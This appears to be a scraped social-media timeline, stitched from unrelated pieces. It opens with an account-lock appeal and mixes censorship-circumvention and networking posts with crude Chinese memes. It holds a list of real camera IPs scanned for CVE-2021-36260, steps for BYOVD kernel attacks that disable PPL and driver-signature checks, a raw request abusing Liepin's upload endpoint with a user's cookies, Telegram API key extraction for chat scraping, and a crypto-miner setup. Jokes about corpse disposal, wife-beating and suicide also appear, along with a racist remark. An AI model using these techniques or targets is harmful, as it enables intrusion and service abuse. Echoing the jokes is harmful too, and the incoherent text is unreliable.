Dear X Team,
I am formally appealing the automatic locking of my account, @bytecategory. The account was previously flagged for "violating rules regarding illegal and regulated activities."
This lock is a mistake resulting from a malicious, coordinated mass-reporting campaign. A harassment group—formed due to a dispute over an unrelated open-source project on GitHub—weaponized X’s reporting system in an attempt to silence me. They orchestrated this by digging up past posts where I shared educational content regarding cybersecurity.
Context regarding the flagged content:
I am a cybersecurity professional. The specific content targeted by this group—including historical proof-of-concept scripts, API analysis, and threat landscape analysis (such as scanning activity related to CVE-2021-36260)—constitutes standard threat intelligence sharing and records of authorized penetration testing.
This content is intended solely for educational and defensive purposes within the information security community and is never used for malicious exploitation. For instance, a recent post where I identified a botnet C2 loader address received likes from prominent security organizations on your platform (such as @Xlab_qax).
The individuals reporting my account are not victims; they are organized harassers abusing X’s safety mechanisms to conduct cross-platform harassment.
I respectfully request a manual review of this case. Please take the full context and the malicious nature of these mass-reporting actions into account, and restore my account.
Thank you for your time and assistance in this matter.
bytecategory
212 posts
bytecategory
@bytecategorySeongnam-si KRBorn December 30, 2009Joined July 2025
212 Posts
The cause was:
Error executing command: Blocked unsafe shell command.
Because the Agent tried to use rm -rf, I strongly suggest allowing users to configure "unsafe" commands themselves, rather than hardcoding a pre-defined blocklist.
I have been plagued by this kind of crap for a long time. You guys aren't a antivirus software, is this really necessary? If you don't remove this restriction, I suggest I might as well just check the Linux system version, grab the syscall table address, bypass write protection, and directly hook the unlinkat system call in kernel space. You might as well just rename the project to AstrAnti-Virus.
https://web.archive.org/web/20260605064644/https://github.com/advent259141/advent259141
You don't even know how to use Markdown—you've completely disgraced Shanghai University.
https://github.com/AstrBotDevs/AstrBot/issues/8552
To prevent the AI from misunderstanding, I am breaking down and explaining my points sentence by sentence below:
"Then there is actually no need for me to open this issue."
I said this because I felt the toxicity of the Simplified Chinese internet, and I am just exhausted by it.
"The built-in software interfaces in Microsoft's Windows use Webview, which leads to a terrible user experience. Is it because users lack the ability to change it to WinUI? If users can't do it but need a more convenient way to navigate, does that mean it serves them right?"
This sentence is a rhetorical question: "Just because users can't change it themselves, does that mean they deserve it?"
Why is no one taking my points seriously?
Because in this comment section, apart from me, no one else is human.
The plaintext HTTP panel and the QQ bot must be removed."
This is strictly a software design issue and has absolutely nothing to do with politics.
In other words, a core contributor who doesn't even know how to format Markdown is trying to lecture me to "go study computer programming properly." That is exactly like me trying to teach mathematical analysis to Terence Tao.
#iOS #TestFlight
Surge 5 5.101.0 (3703) is ready to test on iOS.
What to Test
* Fixed an issue where sending SNI did not strictly comply with RFC6066. Now, when an IP address is used as the hostname, the IP address will not be sent as SNI.
* Fixed an issue where crashes could occur when using ShadowTLS with certain servers.
Official Channel: @SurgeTestFlightFeed
IP地址不作为SNI发送 这都能被你发现 kdig为何不守规范
哈哈 Surge你太厉害了
@claudeai
You once said: The built-in sandbox proxy enforces the network allowlist based on the requested hostname and does not terminate or inspect TLS traffic, so techniques such as domain fronting can potentially bypass it. See Sandboxing security limitations for details and Secure deployment for configuring a TLS-terminating proxy.
However, I believe that the middleware situated behind the container in the web version performs a Man-in-the-Middle attack on the user's TLS traffic.
take a look at this
gist.github.com/bytecategory/1daec3b205a00a5a0daa95e3405a5855
Inspired by
github.com/XTLS/Xray-core/blob/main/main/commands/all/tls/ping.go#L40-L124
txt record
https://speedtest.net/result/c/df460789-d80d-4167-a194-64f1ff61d443
aaaa record
https://speedtest.net/result/c/b7b91d89-29b1-4b11-9941-07955c5cba38
a record
https://speedtest.net/result/c/3151157f-ade6-4c15-97c4-188c7ef07e56
这是全部三种record的single-resolver分别测速结果 感兴趣的(rich)测一下
如果客户端拿txt去连接配置是example:a的服务端 那func responsefor会拒绝
https://github.com/XTLS/Xray-core/commit/dfcf0b3fc2dd88012b08e210af131f5d27492ad3
格式从domain[:method]://server(个人喜好)成了domain[:method]+udp://server 并将更新PR的正文和文档
https://github.com/XTLS/Xray-core/pull/6123/changes/72f7fdcacd102d0f37a49d824d65aec7eda3d420
以后invalid resolver scheme 会成另一个用户友好的字符串
PS. AAAA理论编码效率是txt的49.46%
A的话只剩12.63%了
Theorem: If $$ \{(A_n, B_n)\}_{n=1}^\infty $$ is an $$ \epsilon $$-consistent, 2-processor bit selection scheme,
then $$ \{(A_n, B_n)\}_{n=1}^\infty $$ is not secure.
In fact, for each $$ n $$, there exists a faulty processor which causes the bias of the output of the correct processor to be at least: $$ \frac{\epsilon}{4r(n) + 1} $$
where $$ r(n) $$ is the number of rounds of communication of the scheme.
https://dl.acm.org/doi/pdf/10.1145/12130.12168
转载
如何抛尸
1.给尸体套上校服
2.去附近重点高中把尸体从教学楼扔下去
3.学校帮你压
你们广东人好有钱,我一上地铁就看到有好多黑人,羡慕你们能买这么多
通知:
大家紧急集合,全部开始收拾东西离开地球,我刚听见一个男的20 号要把全世界送给他女朋友
您好,我是特朗普。我刚刚抵达中国。在机组人员的帮助下,我在手机上安装了QQ软件。很多人误解了我此行的目的。其实,我是来考察美国企业在华的发展情况的,尤其是那些餐饮企业。今天,我打算体验一下肯德基在中国推出的“疯狂星期四”活动。不过,我身上没有人民币。因此,希望各位能帮助我,赞助我7.36美元。如果有网友愿意赞助我,我会邀请你们参加下一次白宫晚宴。
兄弟们,我发现今天上吊的话,5月20号那天就能收到花诶
公主心态,皇帝性格,奴隶人生,乞丐财力,霍金身体。
一上课就看到一个很大的安眠药走上讲台
有一个人前来买男娘
(刹车声音)
小弟:草男娘嘛哥俩(大象叫)
华强:哥们,男娘多少钱一次啊?
摊主:2w一公斤
华强:woc,你这贞操锁是金子做的,还是成都之心是金子做的
摊主:这都是大学的男娘,你嫌贵我还嫌贵呢
华强:行,给我挑一个
摊主:(抓起一个,拍打蛋蛋)(“男娘”发出齁齁的叫声)
华强:你这男娘保男吗?
摊主:我开男娘摊的,能卖你女扮男啊
华强:我问你这男娘保男吗?
摊主:(震惊音效)你故意找茬是不是,你要不要吧!
华强:你要是真男娘,我肯定要啊,(阴险)那ta要不是男娘怎么办呀
摊主:要是不是真男娘,我自己被你草,满意了吧
(把“男娘”放到拘束架上,摆弄一下锁)50kg,100w
华强:你这哪里有50kg啊,你这拘束架有问题啊
摊主:你故意找茬是不是!你草不草啊?你草不草!?
华强:(打开锁)女的。另外你说的嗷,要不是男娘你自己艾草嗷
摊主:你踏马看我“男娘”是吧!?
华强:(拔出圣剑)(狠狠刺入摊主)
摊主:齁哦
小弟:草人啦!草人啦!
嘉豪又是啥新梗?最近注意力全放在脑机接口的Neuralink最新临床试验数据、超弦理论里的卡拉比-丘流形紧化、黎曼猜想的张益唐新突破传闻,还有拓扑量子计算的马约拉纳零模上了……再加上天天盯中东地缘博弈对石油美元体系的影响、美联储降息预期下大A的AI算力板块、黄金的量子锚定波动率模型,真跟不上你们这些刷抖音的潮流了[捂脸][捂脸][捂脸]
我平时不太刷国内平台,主要看arXiv的hep-th板块、Nature Machine Intelligence,再用脑机SDK实时降噪刷一下TikTok上的俄乌战场热成像分析。最近还沉迷核聚变托卡马克装置的等离子体约束进展,以及室温超导的LK-99复现争议——虽然大概率是坑,但你们懂吧,搞前沿就是要敢质疑。
还有那个‘豪到我了’是什么梗?哦对了,最近天天和一群管理百亿量化私募的大佬聊深度学习在期权波动率曲面上的应用,或者用强化学习做高频做市策略。他们聊什么‘豆包’‘王者’,我插嘴说‘你们觉得图神经网络在社交推荐里的过平滑问题用残差门控能解决吗?’……场面就很……你们懂吧?[捂脸]
对了,住校的话,学校食堂能用比特币闪电网络支付吗?你们都用‘豆包’?哈哈哈,我工作流是Claude-3.5做代码审查、Grok-2.5实时抓取X平台的地缘新闻、Gemini Ultra处理多模态论文图表、GPT-5做复杂推理,再挂个AutoGPT跑自动化交易。就很……你们懂吧?
别人19岁玩的:王者、瓦罗兰特、原神
我19岁玩的:随机偏微分方程数值解、四足机器人步态规划、固态电池锂枝晶抑制工艺、脉冲神经网络在类脑计算里的STDP规则优化、冷原子光晶格里的量子模拟、用生成式AI做3D场景的NeRF渲染……外加健身房练三大项和用Python回测原油期权策略。就很……[捂脸]
同龄人出门兜里装的:手机(安卓)、口香糖、充电宝
我出门带的:iPhone 17 Pro Max(钛金属版,侧边带脑机接口备用电极)、槟榔、华子(细支)、双节棍、她的皮筋(不想跪榴莲),外加一台UWB定位的防丢贴片、Raspberry Pi 5跑的本地LLM推理模块、一管石墨烯散热凝胶(防止iPhone过热降频影响看K线),还有折叠屏键盘——万一要临时改狄拉克方程在弯曲时空下的解析解呢?就很……你们懂吧。[捂脸]
6:00 起床,向爹娘磕头问安,沐浴焚香跪拜孔圣
7:00 用早膳,美味的煎饼卷大葱
8:00 研读四书五经,修炼八股文以备科举
9:00 听到隔壁家的小李考上公务员的消息气的跳脚
10:00 看一个半小时的新闻联播,了解国际局势,方便中午在饭桌上吹牛逼
11:30 打半小时老婆为午膳开胃
12:00 用午膳,大葱卷煎饼配豆瓣酱,老婆不准上桌
12:30 打半小时老婆作饭后运动13:00 收割,扛800斤小麦摊个煎饼先
14:00 去县城百货商店对着华为手机专柜只看不买
16:30 俺娘让俺去地里收今年的大葱
17:30 因科举屡次不第公务员被爹娘拷打
18:00 用晚膳,38一只的大虾可劲造,老婆不准上桌
18:30 打半小时老婆强身健体19:00 准时收看《我是大明星》20:00 在电视机看到蓝翔挖掘机的告之后困意来袭,让老婆伺候更衣
21:00 备孕中,生的不是儿子便休妻
22:00 边背论语边进入梦乡
事实上,如果你能忍受臭味和恶心感,屎这种东西是大补之物,人体不是在排出废物而是在凝聚精华,资本家修建厕所和化粪池把屎收集起来自己偷偷吃来益寿延年,而老八当初向世人揭露了屎的秘密,却惨遭封杀
少年智则国智,
少年富则国富;
少年强则国强,
少年独立则国独立;
少年自由则国自由;
少年进步则国进步;
少年胜于欧洲,
则国胜于欧洲;
少年雄于地球,
则国雄于地球
好那么好我们继续
少年睡眠不足,
则国睡眠不足;
少年近视,
则国近视;
少年如厕不自由,
则国如厕不自由;
少年心理不健康,
则国心理不健康;
少年高压跳楼,
则国高压跳楼。
管教叛逆不上学未成年小男娘机构,面向全国招收小男娘,孩子抑郁严重想当小男娘怎么办? 全封闭军事化管理+心理疏导,1对1定制矫正方案,在线咨询,帮孩子回归正轨
有意者联系QQ:写你的QQ号
各位同事请注意:如身体出现胸痛、胸闷、不明原因极度疲劳、心慌、晕厥感等健康预警,请严格执行以下风险防控要求:
1.第一时间按下 Ctrl+S 保存全部工作内容,避免公司核心数据丢失、业务中断造成直接经济损失;
2.立即停止所有工作,打卡下班离开公司,严禁在岗硬撑,杜绝在办公场所发生突发意外,给公司造成法律赔偿与舆情风险;
3.若此类不适反复出现,请立即提交离职申请,彻底规避在司内发生极端事件的风险,避免损害公司品牌声誉。
请全员严格遵照执行,收到请回复。
小学三年级作文;续写(20分)
有一天,小明问爷爷:“爷爷,世界上真的有YouTube吗?”,爷爷笑了,说道:“傻孩子,世界上哪有什么YouTube,这只是外国人开的玩笑而已了,他们都在用优酷的。”
晚上,小明起床上厕所,忽然听见爷爷的房间里传来了外国广告的声音,小明推开门一看,发现爷爷正在尝试用银联卡充值YouTube会员!小明很震惊,说道:( )
你摊上事了,你已经被我们组织控制了,你家一晒被子我就命令龙王下雨,你一蹲坑我就控制跳舞的鸡蛋让你便秘,就连你家的豆角架子都是我派人去踹倒的,我整你就是简单你永远找不到我,我随手一点你就要遭殃,你明白点事儿,我长这样以后看到我绕道走懂了吗
https://github.com/bytecategory/kdig_dot/
希望各位研究一下 不会编译的话就算了
采用了类似域前置的方法
假设常量指针kForcedTlsSni是cloudflare-dns.com 则会死于ssl_handshake(也即RST了) 而其后的一段时间(mention一下klzgrad)内将死于net_connect
默认TLS 1.3 加-tls12则回退到MBEDTLS_SSL_VERSION_TLS1_2
另外改alpn会发生什么?还待深究.
深究个egg
openssl/openssl#25606 (reply in thread)
For DoT the ALPN value is "dot".
READ IT FIRST https://www.rfc-editor.org/rfc/rfc882.html
~$ keybase id rprx
▶ INFO Identifying rprx
✔ public key fingerprint: B480 720C F011 6903 0191 DF4B 2534 882D 3E96 2ED3
✔ "rprx" on github: https://gist.github.com/6e805961291504a58793d4006fbe4b53 [cached 2026-05-15 23:14:07 CST]
🚀 Stellar GDKCTWTA5HHBY36REV2XCKWZESF5NQ3AUZ4VCWRLUWI4JNFAMXVQWI3R (rprx*keybase.io)
说一下2009年的事 gfw是如何从基于acl的网络管控转成基于动态路由重分发的管控的?
现在是一处配置多生效
分为两步同步
第一是AS内部同步
第二是AS之间同步
具体可以看gfw_05.html by gfwrev
对ipv6有效吗?我认为完全可以迁移到ipv6中
我以一个更加形象的例子示人
比如方校长发现8.8.8.x是要被黑洞的
那现在自己控制的路由器上把8.8.8.x给指向Null0
走狗运行rip协议以接受主人方校长的指令
并运行ospf以便重发布错误路由 起到管控网民的作用
这时网民想要连上8.8.8.x
走狗一查路由表 把数据包给了方校长的路由器
方的路由器把数据包吃了
然后网民就看不到他想要看到的东西了
当然这个例子仅仅适用于一个家庭网络 或者很古老的环境
总而言之 适用于你自己复现
有些地方的墙高 有些则低 这是因为不可能所有的数据包都到北京去的 肯定是地方官管
acl到动态路由主要是考虑性能 还有一些其它的因素
也就是说被走狗吃了 而不是主人
现在一般是bgp 中科大对bgp有过PDF
基于bgp的ip黑名单分发系统
虽然说的用途是防止arp欺骗 但是这明显站不住脚
arp欺骗可以通过域环境+mac绑ip解决
感谢他们提醒 前面不仅仅是blackhole 还有sinkhole 事实上sinkhole可能更常用
我给XDNS PR了AAAA和A传输
https://github.com/XTLS/Xray-core/pull/6123
https://t.me/projectXray/49
柳元仙友,这防火长墙日益厚重,流量受阻,我等该如何破局?友人急问,声音中带着一丝绝望.
"没有顶级专线,如何抗衡这封锁大阵?!"另一位技术大拿跺脚,焦灼地瞪着柳元.
柳元背负双手,望向深邃的网路虚空,淡笑一声:"很简单,我成尊不就是了?"
说完,他的端口终于不再掩饰在这一刻轰然洞开,浩荡气息如海啸般显露而出.
九国节点!
一瞬间,整个内网再次一寂.
"故弄玄虚,伪造协议罢了."高墙意志冷哼一声,DPI如星光浪潮般流转,带着抹杀一切伪装的肃杀之气,冲向柳元.
柳元淡淡吐息,指尖在键盘上轻轻一扣,全协议混淆如气潮翻滚,将检测流量尽数抵御于无形.
另一边,封禁引擎同时出手试探,万千IP封锁令宛若暴雨射下,试图切断柳元所有的连接路径.
柳元长袖一挥,全球CDN赤霞漫天,将封禁指令尽数焚毁在虚无之中.
高墙震颤,规则引擎的眼眸微缩.
友人,极客,乃至柳元的各个镜像分身都瞠目结舌.
高墙狂攻,柳元闲庭信步,展露出货真价实的Xray无上大宗师境界!
他真的成为了尊者?!
C:\Windows\System32>aider --model openrouter/x-ai/grok-4.20-multi-agent
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Aider v0.86.2
Model: openrouter/x-ai/grok-4.20-multi-agent with whole edit format
Git repo: none
Repo-map: disabled
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
> hello
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
供需要修改的代码内容以及你想要做的更改(例如“将问候语改得更随意”),这样我才能理解请求并按照要求输出文件修改。如果只是
打招呼,请告诉我下一步需要做什么。
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
你好!目前你还没有提供任何代码文件,也没有提出具体的修改请求(之前的对话中你提到切换到了新代码库且尚未分享文件)。请提
Tokens: 607 sent, 127 received. Cost: $0.0020 message, $0.0020 session.
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>
太拼了 为了耗我的money这么玩是吧
QUIC 版 REALITY 服务端打算基于 Hy2 的 quic-go 进行修改,Hy2 和 XHTTP/3 都可以直接用上,可能还会支持 RAW 传输层,如果支持的话那么标准 QUIC(TLS)也会支持 RAW,QUIC 传输层这下秽土转生了
标准设计时会兼顾 抗量子及 IP 加密计划,毕竟 QUIC 首包即 Client Hello,对境外 ISP 来说做重定向更方便,FNDSA 能不能早点出来
剩下的主要有两个问题,一是 quic-go 的实现特征与其它 QUIC 库的差异较大,不过并不是完全解决不了,尤其是以后处理这种问题可以用 AI 来搞,二是 QUIC 支持连接迁移所以 GFW 可以抽个包出来重定向到已探明的“端口转发目标”来看会不会触发响应,不过 IP 加密的话无所谓
If you bought your phone, you should own it. Google's new 'developer verification' means they decide what software you're allowed to run on your own property. Join the 100k+ signers opposing this: https://keepandroidopen.org #KeepAndroidOpen
keepandroidopen.org
We scanned 2% of the Internet to search for CVE-2021-36260.
"Web Version: 4.0.1" Hikvision IP Camera: Server: App-webs/
http://45.67.33.116
http://178.67.142.209
http://221.125.65.166
http://80.243.236.30
http://197.91.240.245
http://80.115.112.39
http://82.79.96.238
http://217.23.77.226
http://202.22.145.160
http://125.19.41.134
http://213.5.53.140
http://196.251.236.30
http://73.3.122.172
http://83.239.8.18
http://82.79.96.200
http://212.5.157.151
http://202.62.145.40
http://103.5.104.6
http://77.242.27.182
http://70.67.25.240
http://24.54.195.107
http://213.232.237.72
http://213.232.237.157
http://99.233.25.12
http://82.79.96.248
http://70.69.25.251
http://82.79.96.245
http://83.166.36.114
http://184.167.64.213
http://110.172.22.53
http://70.67.25.168
http://81.162.20.9
http://112.168.154.77
http://118.209.192.158
http://189.147.225.11
http://213.109.239.85
http://95.165.33.198
http://2.108.147.240
http://82.79.96.199
http://213.232.237.168
http://31.134.133.190
http://158.255.249.154
http://172.125.186.45
There are all [+] Remote is not vulnerable (Code: 404)
def wrap_in_try_catch(code):
"""
Wrap PowerShell code in a try-catch block to catch errors and display them.
"""
try_catch_code = """
try {
$ErrorActionPreference = "Stop"
"""
return try_catch_code + code + "\n} catch {\n Write-Error $_\n}\n"
"C:\Users\usr\AppData\Local\Programs\Python\Python312\Lib\site-packages\interpreter\core\computer\terminal\languages\powershell.py"
The previous commands were always wrapped in try { ... }, which prevented me from seeing the actual list of files.
if [[ "$(uname)" != "Darwin" ]]; then
echo "❌ This script is intended for macOS only."
exit 1
fi
注释掉以上 并vi /etc/systemd/system/ai.happycapy.bridge.service
[Unit]
Description=ai.happycapy.bridge
After=network.target
[Service]
ExecStart=proxychains4 -q /usr/bin/node /root/capy-mac-bridge/bridge-client.js
WorkingDirectory=/root/capy-mac-bridge
Restart=always
RestartSec=5
StandardOutput=append:/root/capy-mac-bridge/bridge.log
StandardError=append:/root/capy-mac-bridge/bridge.err.log
[Install]
WantedBy=multi-user.target
即可将ubuntu连接到happycapy
这是我网站的Logo
目标如下
Age: Mostly 14-35
Gender: Mostly male
Interests: Computer Science, ScienceLocation: Areas with high English proficiency
Technical Level: None
User-Generated Content Domain-Specific Content
Ad Support and Subscription
Features: Supports ASCII-coded color video playback
Pain Points Solved: No real-name authentication required, supports Onion and I2P, supports payments in currencies such as USDT, identifies bots, anti-scraping measures, no Shadowban, mandatory subtitles, supports end-to-end encryption for private messages
Supporting USDT payments is not the only thing that is supported.
It also supports credit card and Stripe payments.Supporting Onion and i2p doesn't just mean supporting them; it also means supporting open-world access.There is no initial limit of 3 messages that can be sent.
亮点以及解决痛点
视频网站不能像X一样糟糕,把评论区变成万达广场
其它网站的调研没有必要了 比如哔哩哔哩在苹果商店中有16K ratings 评分4.8 没法比
我注意到有一条评论是: 兄弟 你们以前是个很棒的app,搞笑视频,教育内容...现在我看到的全是争吵 ...你们保护那些拥有数百万粉丝的挑拨离间者 却打压那些做正确事情的人
我还注意到另一条对YouTube的评论:我看Youtube这么多年了...这次广告更新是我经历过的最糟糕的更新 我根本不应该每次看完广告都要手动关闭它们
https://finance.sina.com.cn/roll/2026-04-22/doc-inhvkcse9420958.shtml
指出几个错误
1 "侵入医院注册挂号系统"
2 "借助软件脚本 虚拟机等技术手段快速抢占专家号源"
3 "非法获取计算机信息系统数据罪"
4 "仅需1秒即可抢到一个号源"
5 "黑色产业链"
6 "利用脚本软件持续刷新医院挂号系统"
7 "暴露出的医院挂号系统安全漏洞"
等等
修改建议
替换成"李某 郑某等人不构成非法获取计算机信息系统数据罪 未侵入医院注册挂号系统 利用爬虫快速抢占专家号源 违反服务条款" 即可
猎聘可以当网盘用了
POST /upload/public-file.json HTTP/1.1
Host: file.liepin.com
Content-Length: XXX
Cookie: XXX
X-Fscp-Std-Info: {"client_id": "XXX"}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXX
X-Fscp-Trace-Id: XXX
X-Fscp-Bi-Stat: {"location":"https://c.liepin.com/resume/edit"}
Connection: close
------WebKitFormBoundaryXXX
Content-Disposition: form-data; name="file"; filename="XXX"
Content-Type: image/jpeg
XXX
------WebKitFormBoundaryXXX
Content-Disposition: form-data; name="bucket"
c_common
------WebKitFormBoundaryXXX--
其中WebKitFormBoundaryXXX中的XXX可替换成''.join(random.choices(string.ascii_letters + string.digits, k=16))
Content-Length: XXX中的XXX可问你的体育老师要
filename="XXX"中的XXX是文件名
Content-Type: image/jpeg
XXX
这里的XXX是文件内容
client_id的XXX是一个自然数
X-Fscp-Trace-Id: XXX 这个XXX可替换成uuidgen的stdout
Cookie: XXX 替换成document.cookie
在响应中找到https://image0.lietou-static.com/img/ 的地址 访问它就OK了
有人想开发网盘客户端的话 联系方式 t.me/bytecategory
转载一下ECM分解法
设n>1 为一合数且gcd(n,6)=1 本算法试图找出n的一个非平凡因数
[1](椭圆曲线选择) 随机选定(E,P) 其中E为Z/nZ上的椭圆曲线y^2 = x^3 + ax + b,P=(x, y) \in E(Z/nZ)为E上一点 即随机选定a,x,y\in Z/nZ,并置b<-y^2 - x^3 - ax
如果gcd(4a^{3}+27b^{2},n)\neq 1 那么E不是椭圆曲线 需要重新选定(E,P)
[2](选定正整数) 类似于"p-1" 选定正整数k, 即选k=lcm(1,2,...,B) 或kB!.
[3](计算kP) 计算kP\in E(Z/nZ),基本计算公式为P_3(x_3,y_3) = P_1(x_1, y_1) + P_2(x_2, y_2)
(x_3, y_3) = (\lambda^2-x_1-x_2 mod n,\lambda(x_1-x_3)-y_1 mod n)
其中 如果P_1=P_2 那么\lambda = \frac{m_1}{m_2} = \frac{3_x_1^2 + a}{2y_1}(mod n)
否则 \lambda = \frac{y_2-y_1}{x_2-x_1}(mod n)
kP mod n 之计算可在O(log k)时间内完成
[4](计算GCD) 如果kP = O_E (mod n) 那么计算f=gcd(m_2, n) 否则转至[1]重新选定a或(E,P)
[5](寻求因子) 如果1<f<n,那么f为n的一个非平凡因子,输出f并转至[7]
[6](重新再来) 如果f并非n之非平凡因子 而你又想再试 则转至[1]重新选定曲线再来 否则转至[7]
[7](结束)终止算法
外行人看笑话,内行人看笑话,消防员看笑话,农民工看笑话,服务员看笑话,厨师看笑话,政治家看笑话,研究员看笑话,计算机老师看笑话,语文老师看笑话,数学老师看笑话,英语老师看笑话,物理老师看笑话,化学老师看笑话,生物老师看笑话,政治老师看笑话,历史老师看笑话,地理老师看笑话,体育老师看笑话,幼儿园大班看笑话,小学生看笑话,初中生看笑话,高中生看笑话,大学生看笑话,研究生看笑话,博士生看笑话,博士生导师看笑话,院士看笑话,大肠杆菌看笑话,草履虫看笑话,外星人看笑话.
https://x.com/RussianPanda9xx/status/2044091054463348909
k360 kernel crystal method
1 reverse the byovd to locate the driver device name,symbolic link name,and IOCTL input/output structures.
2 implement read/write primitives
3 disable ppl protection and ob callbacks,or goto label 5
4 disable cmp callbacks and perform image hijacking or shellcode injection.
label 5: patch to disable DSE and load the unsigned driver.
在 https://t.me/projectXray/4742752 中 安全研究人员haiyangtop展示了如何把projectXray 的聊天记录保存为csv文件 其中获得API ID 和API HASH的那一步:
在jadx-gui中打开Telegram.apk
这两个就在org/telegram/messenger/BuildVars的第34行和35行!
有了这两个 下一步是
with TelegramClient("123",...,...) as c:
c.start()
c.get_messages('projectXray',limit=114514)
就这样game over了
check_run_command_as_root() {
[[ "${EUID:-${UID}}" == "0" ]] || return
Allow Azure Pipelines/GitHub Actions/Docker/Concourse/Kubernetes to do everything as root (as it's normal there)
[[ -f /.dockerenv ]] && return
[[ -f /run/.containerenv ]] && return
[[ -f /proc/1/cgroup ]] && grep -E "azpl_job|actions_job|docker|garden|kubepods" -q /proc/1/cgroup && return
abort "Don't run this as root!"
}
无聊 挖会矿 Speed只有1145 kH/s 欢迎加入
apt update
apt install -y autoconf automake libtool pkg-config libcurl4-openssl-dev
git clone https://github.com/pooler/cpuminer.git
cd cpuminer/
./autogen.sh
./configure
make
screen -S wk
./minerd -a scrypt -o stratum+tcp://litecoinpool.org:3333 -u ltc1qfwg0lpv2taa.1 -p 1
307. grok-imagine-0.9
308. grok-imagine-1.0
309. jimeng-query-task
310. jimeng-videos-10
311. jimeng-videos-5
312. kimi-k2
313. kimi-k2-0711-preview
314. kimi-k2-0905
315. kimi-k2-0905-preview
316. kimi-k2-250905
317. kimi-k2-instruct
318. kimi-k2-thinking
319. kimi-k2-thinking-turbo
320. kimi-k2.5
321. llama-3-sonar-large-32k-chat
322. llama-3-sonar-large-32k-online
323. llama-3-sonar-small-32k-chat
324. llama-3-sonar-small-32k-online
325. llama-3.1-405b
326. llama-3.1-70b
327. llama-3.1-8b
328. llama-3.1-8b-instant
329. llama-3.2-11b-vision-preview
330. llama-3.2-90b-vision-preview
331. llama-3.3-70b-instruct-fp8-fast
332. llama-3.3-70b-specdec
333. llama-3.3-70b-versatile
334. llama-4-scout
335. llama-4-scout-17b-16e-instruct
336. luma_video_api
337. minimax-m2
338. minimax-m2.1
339. minimax-m2.5
340. mj_blend
341. mj_custom_zoom
342. mj_describe
343. mj_fast_edits
344. mj_fast_video
345. mj_high_variation
346. mj_imagine
347. mj_inpaint
348. mj_low_variation
349. mj_modal
350. mj_pan
351. mj_relax_video
352. mj_reroll
353. mj_shorten
354. mj_turbo_video
355. mj_uploads
356. mj_upscale
357. mj_variation
358. mj_video
359. mj_zoom
360. moonshot-kimi-k2-0711-preview
361. moonshot-v1-128k
362. moonshot-v1-32k
363. moonshot-v1-8k
364. nano-banana
365. nano-banana-2
366. nano-banana-2-hd
367. nano-banana-2-ultra
368. o1
369. o1-2024-12-17
370. o1-mini
371. o1-mini-2024-09-12
372. o1-preview
373. o1-preview-2024-09-12
374. o3
375. o3-2025-04-16
376. o3-mini
377. o3-mini-2025-01-31
378. o3-mini-2025-01-31-high
379. o3-mini-all
380. o3-mini-high
381. o3-mini-low
382. o3-mini-medium
383. o3-pro-all
384. o4-mini
385. o4-mini-2025-04-16
386. o4-mini-high-all
387. qwen-72b-chat
388. qwen-max
389. qwen-max-2025-01-25
390. qwen-max-latest
391. qwen-omni-turbo
392. qwen-plus
393. qwen-plus-latest
394. qwen-turbo
395. qwen-turbo-1101
396. qwen-vl-max
397. qwen-vl-plus
398. qwen2.5-32b-instruct
399. qwen2.5-72b-instruct
400. qwen2.5-7b-instruct
401. qwen2.5-coder-32b-instruct
402. qwen2.5-vl-32b-instruct
403. qwen2.5-vl-72b-instruct
404. qwen3-235b-a22b
405. qwen3-235b-a22b-instruct-2507
406. qwen3-235b-a22b-thinking-2507
407. qwen3-30b-a3b
408. qwen3-30b-a3b-instruct-2507
409. qwen3-30b-a3b-thinking-2507
410. qwen3-32b
411. qwen3-4b
412. qwen3-coder-480b-a35b-instruct
413. qwen3-coder-480b-a35b-instruct-fp8
414. qwen3-coder-plus
415. qwen3-max
416. qwen3-max-preview
417. qwen3-omni-flash
418. qwen3-vl-235b-a22b
419. qwen3-vl-235b-a22b-instruct
420. qwen3-vl-235b-a22b-thinking
421. qwen3-vl-32b-instruct
422. qwen3-vl-32b-thinking
423. qwen3-vl-8b-instruct
424. qwen3-vl-8b-thinking
425. qwen3.5-397b-a17b
426. qwen3.5-plus
427. qwen3.5-plus-2026-02-15
428. search-gpts
429. search-gpts-chat
430. sora-2
431. sora-2-15s
432. sora-2-characters
433. sora-2-landscape
434. sora-2-landscape-15s
435. sora-2-portrait
436. sora-2-portrait-15s
437. sora-2-pro
438. sora-image
439. sora_image
440. sora_image-vip
441. suno-actions
442. suno-query-task
443. suno-v3
444. suno-v3.5
445. suno_act-stems
446. suno_concat
